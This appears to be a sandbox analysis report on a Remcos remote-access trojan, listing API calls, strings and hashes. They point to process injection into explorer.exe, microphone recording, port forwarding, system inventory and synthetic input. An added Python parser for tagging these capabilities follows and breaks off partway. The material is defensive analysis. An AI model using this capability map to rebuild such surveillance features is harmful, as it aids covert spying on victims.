                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                        • String ID:
                        • API String ID: 297527592-0
                        • Opcode ID: 1b52e587fb9d9e89c8408f811d16bdaf082f1bab315b69f0c216b55e30adf48b
                        • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
                        • Opcode Fuzzy Hash: 1b52e587fb9d9e89c8408f811d16bdaf082f1bab315b69f0c216b55e30adf48b
                        • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                        • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Service$CloseHandle$Open$ControlManager
                        • String ID:
                        • API String ID: 221034970-0
                        • Opcode ID: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                        • Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
                        • Opcode Fuzzy Hash: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                        • Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
                        APIs
                        • _free.LIBCMT ref: 00448135
                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                        • _free.LIBCMT ref: 00448141
                        • _free.LIBCMT ref: 0044814C
                        • _free.LIBCMT ref: 00448157
                        • _free.LIBCMT ref: 00448162
                        • _free.LIBCMT ref: 0044816D
                        • _free.LIBCMT ref: 00448178
                        • _free.LIBCMT ref: 00448183
                        • _free.LIBCMT ref: 0044818E
                        • _free.LIBCMT ref: 0044819C
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                        • Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
                        • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                        • Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Eventinet_ntoa
                        • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                        • API String ID: 3578746661-3604713145
                        • Opcode ID: a7bd2cf574d9c29f0f452118638ed50856907e78b238ba203f6b8faaf9cf41f8
                        • Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
                        • Opcode Fuzzy Hash: a7bd2cf574d9c29f0f452118638ed50856907e78b238ba203f6b8faaf9cf41f8
                        • Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
                        APIs
                        • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: DecodePointer
                        • String ID: acos$asin$exp$log$log10$pow$sqrt
                        • API String ID: 3527080286-3064271455
                        • Opcode ID: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                        • Instruction ID: ff4fc8d1aadbe784407353d8516796ad37925c88dabf63da6293f70e8270e0de
                        • Opcode Fuzzy Hash: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                        • Instruction Fuzzy Hash: 16519F71900909CBCF10CF58E9485BEBBB0FF49306FA14197D841A73A6DB399D298B1E
                        APIs
                        • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,PkGNG,0044BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B3FE
                        • __fassign.LIBCMT ref: 0044B479
                        • __fassign.LIBCMT ref: 0044B494
                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                        • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BB31,?), ref: 0044B4D9
                        • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BB31,?), ref: 0044B512
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                        • String ID: PkGNG
                        • API String ID: 1324828854-263838557
                        • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                        • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
                        • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                        • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
                        APIs
                        • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                          • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                        • Sleep.KERNEL32(00000064), ref: 00417521
                        • DeleteFileW.KERNEL32(00000000), ref: 00417555
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CreateDeleteExecuteShellSleep
                        • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                        • API String ID: 1462127192-2001430897
                        • Opcode ID: 1f6a825730162cc8d70e4a327bcc3a42f02bec4a5cc2bca23683888e0af1c848
                        • Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
                        • Opcode Fuzzy Hash: 1f6a825730162cc8d70e4a327bcc3a42f02bec4a5cc2bca23683888e0af1c848
                        • Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
                        APIs
                        • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
                        • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Users\user\AppData\Roaming\jdSldfVS.exe), ref: 0040749E
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CurrentProcess
                        • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                        • API String ID: 2050909247-4242073005
                        • Opcode ID: 539e8bced36223118afef646be0064b2910b8cfba0236f50484b60453eb32d25
                        • Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
                        • Opcode Fuzzy Hash: 539e8bced36223118afef646be0064b2910b8cfba0236f50484b60453eb32d25
                        • Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
                        APIs
                        • _strftime.LIBCMT ref: 00401D50
                          • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                        • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                        • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                        • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                        • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                        • API String ID: 3809562944-243156785
                        • Opcode ID: 056d7ed0179ee1e3bc41876d6f94bfa6cd5a524795bf822a31929a0c00ad1597
                        • Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
                        • Opcode Fuzzy Hash: 056d7ed0179ee1e3bc41876d6f94bfa6cd5a524795bf822a31929a0c00ad1597
                        • Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E
                        APIs
                        • std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
                        • int.LIBCPMT ref: 00410E81
                          • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                          • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                        • std::_Facet_Register.LIBCPMT ref: 00410EC1
                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
                        • __Init_thread_footer.LIBCMT ref: 00410F29
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                        • String ID: ,kG$0kG
                        • API String ID: 3815856325-2015055088
                        • Opcode ID: e119dbdcd7508405a4e8dfb13a442e59be6990f0aecb212b832b7139a16d9266
                        • Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
                        • Opcode Fuzzy Hash: e119dbdcd7508405a4e8dfb13a442e59be6990f0aecb212b832b7139a16d9266
                        • Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D
                        APIs
                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                        • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                        • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                        • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                        • waveInStart.WINMM ref: 00401CFE
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                        • String ID: dMG$|MG$PG
                        • API String ID: 1356121797-532278878
                        • Opcode ID: f0413ad6b7edbe83be065844dac3f0d77922414ea45c2d30098e63d2db50c4df
                        • Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
                        • Opcode Fuzzy Hash: f0413ad6b7edbe83be065844dac3f0d77922414ea45c2d30098e63d2db50c4df
                        • Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                          • Part of subcall function 0041D50F: RegisterClassExA.USER32(00000030), ref: 0041D55B
                          • Part of subcall function 0041D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                          • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                        • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                        • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                        • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                        • TranslateMessage.USER32(?), ref: 0041D4E9
                        • DispatchMessageA.USER32(?), ref: 0041D4F3
                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D500
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                        • String ID: Remcos
                        • API String ID: 1970332568-165870891
                        • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                        • Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
                        • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                        • Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5edaaaea362a6c10ef7d8e875ae5e8a922473b35402a21f9a1197ff68539a873
                        • Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
                        • Opcode Fuzzy Hash: 5edaaaea362a6c10ef7d8e875ae5e8a922473b35402a21f9a1197ff68539a873
                        • Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69
                        APIs
                          • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                        • _memcmp.LIBVCRUNTIME ref: 00445423
                        • _free.LIBCMT ref: 00445494
                        • _free.LIBCMT ref: 004454AD
                        • _free.LIBCMT ref: 004454DF
                        • _free.LIBCMT ref: 004454E8
                        • _free.LIBCMT ref: 004454F4
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$ErrorLast$_abort_memcmp
                        • String ID: C
                        • API String ID: 1679612858-1037565863
                        • Opcode ID: 3b59ec677d4d175c50db296303e2411e5fb3dbfaa0361dba4d40d6cf04aba7d4
                        • Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
                        • Opcode Fuzzy Hash: 3b59ec677d4d175c50db296303e2411e5fb3dbfaa0361dba4d40d6cf04aba7d4
                        • Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: tcp$udp
                        • API String ID: 0-3725065008
                        • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                        • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
                        • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                        • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
                        APIs
                          • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
                        • SetLastError.KERNEL32(000000C1,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
                        • GetNativeSystemInfo.KERNEL32(?,?,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411DA5
                        • SetLastError.KERNEL32(0000000E), ref: 00411DC9
                          • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000,00411DE7,?,00000000,00003000,00000040,00000000), ref: 00411CB3
                        • GetProcessHeap.KERNEL32(00000008,00000040), ref: 00411E10
                        • HeapAlloc.KERNEL32(00000000), ref: 00411E17
                        • SetLastError.KERNEL32(0000045A), ref: 00411F2A
                          • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37), ref: 004120E7
                          • Part of subcall function 00412077: HeapFree.KERNEL32(00000000), ref: 004120EE
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                        • String ID: t^F
                        • API String ID: 3950776272-389975521
                        • Opcode ID: 461a53a6892bac39e8501077da2db8edf6161aa159888280e3eaf045f7e1ced3
                        • Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
                        • Opcode Fuzzy Hash: 461a53a6892bac39e8501077da2db8edf6161aa159888280e3eaf045f7e1ced3
                        • Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9
                        APIs
                        • __Init_thread_footer.LIBCMT ref: 004018BE
                        • ExitThread.KERNEL32 ref: 004018F6
                        • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                          • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                        • String ID: PkG$XMG$NG$NG
                        • API String ID: 1649129571-3151166067
                        • Opcode ID: f03e1696385eff321045f3fd04ccd2f00e10c82d765726f3dffbcfbdf912789a
                        • Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
                        • Opcode Fuzzy Hash: f03e1696385eff321045f3fd04ccd2f00e10c82d765726f3dffbcfbdf912789a
                        • Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
                        APIs
                        • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,00407FFC,00000000), ref: 004079C5
                        • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A0D
                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                        • CloseHandle.KERNEL32(00000000,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A4D
                        • MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
                        • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407A95
                        • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                          • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                          • Part of subcall function 00404B96: SetEvent.KERNEL32(?), ref: 00404BC3
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                        • String ID: .part
                        • API String ID: 1303771098-3499674018
                        • Opcode ID: 3af979d2a86f55abb037a5ea190009b8bddef8696a723389280064d929b35107
                        • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
                        • Opcode Fuzzy Hash: 3af979d2a86f55abb037a5ea190009b8bddef8696a723389280064d929b35107
                        • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
                        APIs
                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004199CC
                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004199ED
                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A0D
                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A21
                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A37
                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A54
                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A6F
                        • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00419A8B
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: InputSend
                        • String ID:
                        • API String ID: 3431551938-0
                        • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                        • Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
                        • Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                        • Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
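The function blocks above already read as a capability map once the API names and string IDs are combined: `ShellExecuteW` with `dxdiag`, `/t` and `\sysinfo.txt` (system inventory written to a temp file, read back, then deleted), `GetCurrentProcess` beside `NtAllocateVirtualMemory` and `\explorer.exe` (injection into explorer), the `waveIn*` family with a `%Y-%m-%d %H.%M` `.wav` name (microphone capture), `CreateFileW`/`WriteFile`/`MoveFileW` with `.part` (download staged under a temporary name and renamed on completion), and the run of `SendInput` calls (synthetic keyboard/mouse input). The script below is an added example by the editor, not code from Joe Sandbox or from the Remcos sample: it parses the per-function text layout this report uses (bullets, `Part of subcall function` prefixes, `String ID:` values separated by `$`, `Opcode ID:`, and the closing `Instruction Fuzzy Hash:` line) and tags each function with heuristic capability labels. The input is a constructed, trimmed imitation of the blocks above, and the rule table and label names are the editor's own assumptions, not Joe Sandbox signature names.

```python
import re
from dataclasses import dataclass, field

# Constructed sample input (modelled on the report layout, not copied verbatim).
SAMPLE_REPORT = r"""
APIs
• ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
  • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000), ref: 0041C49E
• Sleep.KERNEL32(00000064), ref: 00417521
• DeleteFileW.KERNEL32(00000000), ref: 00417555
Similarity
• API ID: File$CreateDeleteExecuteShellSleep
• String ID: /t $\sysinfo.txt$dxdiag$open$temp
• Opcode ID: 1f6a8257
• Instruction Fuzzy Hash: 14313071
APIs
• GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004), ref: 004073DD
• String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$\explorer.exe$explorer.exe$windir
• Opcode ID: 539e8bce
• Instruction Fuzzy Hash: 7031A471
APIs
• CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
• waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B), ref: 00401C8F
• waveInStart.WINMM ref: 00401CFE
• String ID: dMG$|MG$PG
• Opcode ID: f0413ad6
• Instruction Fuzzy Hash: 53212A71
APIs
• CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002), ref: 004079C5
• WriteFile.KERNEL32(00000000,?,00000000,000186A0), ref: 00407A0D
• MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
• String ID: .part
• Opcode ID: 3af979d2
• Instruction Fuzzy Hash: 7F318371
APIs
• _free.LIBCMT ref: 00450F48
• String ID:
• Opcode ID: 5e629f50
• Instruction Fuzzy Hash: B411A231
"""

BULLET = re.compile(r"^[•\s]*")
SUBCALL = re.compile(r"^Part of subcall function [0-9A-Fa-f]+:\s*")
# "<function>.<MODULE>(" or "<function>.<MODULE> ref:"; the MODULE must be upper-case,
# which keeps lines such as "Source File: 00000011.00000002..." from matching.
API_CALL = re.compile(r"^([\w:~@]+)\.([A-Z][A-Z0-9_]*)(?=\(| ref:|$)")


@dataclass
class FuncBlock:
    opcode_id: str = ""
    apis: set = field(default_factory=set)          # direct calls in the function
    subcall_apis: set = field(default_factory=set)  # calls inside "Part of subcall" callees
    strings: list = field(default_factory=list)     # "String ID" entries, split on "$"


def parse_blocks(text):
    """Split the report text into one FuncBlock per 'Instruction Fuzzy Hash' terminated block."""
    blocks, cur = [], FuncBlock()
    for raw in text.splitlines():
        line = BULLET.sub("", raw).strip()
        if not line:
            continue
        if line.startswith("Instruction Fuzzy Hash:"):   # last line of every block
            blocks.append(cur)
            cur = FuncBlock()
            continue
        if line.startswith("Opcode ID:"):
            cur.opcode_id = line.split(":", 1)[1].strip()
            continue
        if line.startswith("String ID:"):
            cur.strings = [s.strip() for s in line.split(":", 1)[1].split("$") if s.strip()]
            continue
        sub = SUBCALL.match(line)
        m = API_CALL.match(line[sub.end():] if sub else line)
        if m:
            (cur.subcall_apis if sub else cur.apis).add(m.group(1))
    if cur.apis or cur.strings or cur.opcode_id:  # trailing block without terminator
        blocks.append(cur)
    return blocks


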